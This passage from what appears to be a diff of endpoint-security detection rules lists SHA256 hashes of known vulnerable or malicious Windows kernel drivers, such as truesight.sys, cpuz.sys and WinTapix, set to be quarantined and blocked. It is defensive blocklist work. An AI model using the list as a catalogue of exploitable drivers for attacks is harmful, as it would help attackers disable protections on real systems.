"hl_testing_start_time": "2026-03-23T11:45:30.472416Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c7f64b27cd3be5af1c8454680529ea493dfbb09e634eec7e316445ad73499ae0", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "de2b70f2-8a86-55fd-93a1-47daeaec9391", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.491814Z", + "creation_date": "2026-03-23T11:45:31.491816Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.491821Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "72a39b2ab86f813db654400e4acafbde33f51c88e88a6ebd2ac3d6acbf159cd7", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "de2d9731-a682-5e8e-902c-4c8cb1e5f0bf", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.811134Z", + "creation_date": "2026-03-23T11:45:31.811136Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.811141Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "692c0ec8d824a93911e7bcf9b15ed43c497f5451b15adf9c1cfb62dc593582a2", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "de378d05-3ebd-5bf8-9961-b42b3adbd567", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.620815Z", + "creation_date": "2026-03-23T11:45:29.620817Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.620823Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": 
"hash", + "value": "db90e554ad249c2bd888282ecf7d8da4d1538dd364129a3327b54f8242dd5653", + "comment": "IBM Vulnerable Physmem drivers (aka citmdrv_amd64.sys and citmdrv_ia64.sys) [https://www.loldrivers.io/drivers/0f21a584-6ace-4242-82cb-9766cea6973a/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "de37e3e3-94b4-5551-b00b-e021d9ee5b6e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.985666Z", + "creation_date": "2026-03-23T11:45:29.985668Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.985674Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f6c316e2385f2694d47e936b0ac4bc9b55e279d530dd5e805f0d963cb47c3c0d", + "comment": "Malicious Kernel Driver related to WINTAPIX (aka WinTapix.sys and SRVNET2.SYS) [https://www.fortinet.com/blog/threat-research/wintapix-kernal-driver-middle-east-countries] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "de3b12bb-c5c8-54fe-b920-fa1b9ca90621", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { 
+ "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.150564Z", + "creation_date": "2026-03-23T11:45:31.150566Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.150571Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "54945c8914963302136ec48806e040f9a1872ba09bb05eafe8f45bc48a075456", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "de3e1f2b-97e2-560b-96f7-e47ed3377863", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.141398Z", + "creation_date": "2026-03-23T11:45:31.141400Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.141405Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "91a25cacb4483da51c27ec91da3afdd72e2574ae319155cc902cce29940ecaca", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka 
truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "de42e94b-82be-57d8-8a22-30faf2f01543", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.810990Z", + "creation_date": "2026-03-23T11:45:31.810993Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.810998Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ceab4c5188d05433959cb3524c9963d006e250c16f4c7cd9c9af7bdd56c969e4", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "de606bb0-6f3d-503b-ad46-b130bc5961ab", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.487432Z", + 
"creation_date": "2026-03-23T11:45:31.487434Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.487440Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "61bacf21287d587d3a362e88a79af872aac0e8795f0d4730031e87b448aa2ac2", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "de7c5027-fcde-59b1-8a05-3e64659254d3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.976137Z", + "creation_date": "2026-03-23T11:45:29.976139Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.976145Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f05b1ee9e2f6ab704b8919d5071becbce6f9d0f9d0ba32a460c41d5272134abe", + "comment": "Vulnerable Lenovo Diagnostics driver (aka LenovoDiagnosticsDriver.sys) [CVE-2022-3699] [https://github.com/alfarom256/CVE-2022-3699] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"de84eace-1153-584d-af0f-3e30c35d321c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.152586Z", + "creation_date": "2026-03-23T11:45:31.152587Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.152593Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "49ca61e32736c4c3792a2e69b6b075fbc31e08612e178d77e8bb8fc75f098e71", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "de88b109-7c24-589e-af7d-2aced2b000ed", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.144596Z", + "creation_date": "2026-03-23T11:45:32.144598Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:32.144604Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "39171fcaff172d6b38762acef3d3352f9a375e3db7e54a7b51261a53b3c94266", + "comment": "Vulnerable Kernel Driver (aka RtsUer.sys) [https://www.loldrivers.io/drivers/71d930a7-3465-4d27-90d4-2a1a08bebb92/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "de8c5c97-6c1a-5bc4-8279-99c8a6efdc1e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.144819Z", + "creation_date": "2026-03-23T11:45:32.144822Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.144827Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c4020e95f8a69522e400d3b14bf1be4fec2e7db0597626fbd8f8c3c1e85bffa0", + "comment": "Vulnerable Kernel Driver (aka ViveRRAudio.sys) [https://www.loldrivers.io/drivers/4cb95b41-43b4-4806-b536-ae5fd8c76b0e/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "de8e3bd4-c117-5bfd-9b80-8ff7735e75dd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.143760Z", + "creation_date": "2026-03-23T11:45:32.143762Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.143768Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9923b3d6e508aa2086c66b36038b37206b0f8d26beaf87022290a2b574c2e047", + "comment": "Vulnerable Kernel Driver (aka DcProtect.sys) [https://www.loldrivers.io/drivers/7cee2ce8-7881-4a9a-bb18-61587c95f4a2/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "de96730d-2f81-5395-8491-7fc2e52cdabd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.822580Z", + "creation_date": "2026-03-23T11:45:31.822584Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.822592Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e8aee9dc95134e49bb19bcf0925addda60372b99dc2ffde0dea68f3573672a98", + 
"comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "dea69269-2a2d-5162-baf5-53c07088537f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.981820Z", + "creation_date": "2026-03-23T11:45:29.981822Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.981828Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4e3887f950bff034efedd40f1e949579854a24140128246fa6141f2c34de6017", + "comment": "Vulnerable Kernel Driver (aka TestBone.sys) [https://www.loldrivers.io/drivers/be4843ef-a2a8-4a0d-91c6-42e165800bb0/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "deade94f-becd-592b-be1a-d471ad088f4e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:31.140209Z", + "creation_date": "2026-03-23T11:45:31.140211Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.140218Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "82b4876716782349f4b7c6d1b0d7041e3e3b4c38d19a9579f1a7cfb11822840c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "deae422d-9300-5f6b-b962-ee24233201ee", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.159535Z", + "creation_date": "2026-03-23T11:45:31.159537Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.159543Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "817aa0ff85446b1420c5608910004a7f379afc67890d36089d2ed7e1aa5757ce", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + 
"source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "deb09886-6c52-500e-a382-1f4c8256201d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.967676Z", + "creation_date": "2026-03-23T11:45:29.967678Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.967683Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c283d02dfdae3e67fbfe7a70f1fc94dd164b0d2e6a905098acd697ff826b707d", + "comment": "Retliften malicious signed drivers (aka netfilter.sys) [https://msrc-blog.microsoft.com/2021/06/25/investigating-and-mitigating-malicious-drivers/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "deb87e89-a127-5b12-a3ee-199c88c45bae", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.456566Z", + "creation_date": "2026-03-23T11:45:30.456569Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + 
"endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.456578Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5ea5f339b2e40dea57378626790ca7e9a82777aacdada5bc61ebb7d82043fa07", + "comment": "Vulnerable Kernel Driver (aka iobitunlocker.sys) [https://www.loldrivers.io/drivers/e368efc7-cf69-47ae-8204-f69dac000b22/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "debee8ea-934a-589b-b15f-afee6c9f9a6b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.147553Z", + "creation_date": "2026-03-23T11:45:31.147555Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.147560Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cbef55713e8f6db9a0a7bcb71f1599ac663a947911ec1a87693ce6c26bc4cf90", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "dec7590e-c033-5748-b5bd-f298b2593674", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": 
"quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.146456Z", + "creation_date": "2026-03-23T11:45:31.146458Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.146464Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "aea434cd31c278819342851c8769847a75376273bb214f2d19082e0a55e1ab14", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "decb5842-e730-577a-bc26-f2dd83b433a9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.979743Z", + "creation_date": "2026-03-23T11:45:29.979745Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.979751Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "948735962436df24baa69e58421345d4a295e0821f4f93fd9f64e11f51a9666f", + "comment": "Malicious Kernel Driver (aka windbg.sys) [https://www.loldrivers.io/drivers/da7314dc-6cf1-4d74-a0d1-796fc08944f8/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ded0bd6b-5f87-57ce-8efd-578d6781bca1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.491938Z", + "creation_date": "2026-03-23T11:45:31.491940Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.491946Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8a1b6c77ff2b68bbc492047d56234192f8a7ae7a69e92737e38db67a8e35ceb4", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ded40bbc-1bc0-5abc-a8ab-d4870595901f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.824097Z", + "creation_date": "2026-03-23T11:45:30.824099Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.824104Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "00d957e49a5b6c290c8d0f645b91d2688396c708464ae3da33b79d4ff964874b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "dedff988-300f-56ee-a8c9-188aa9b544cd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 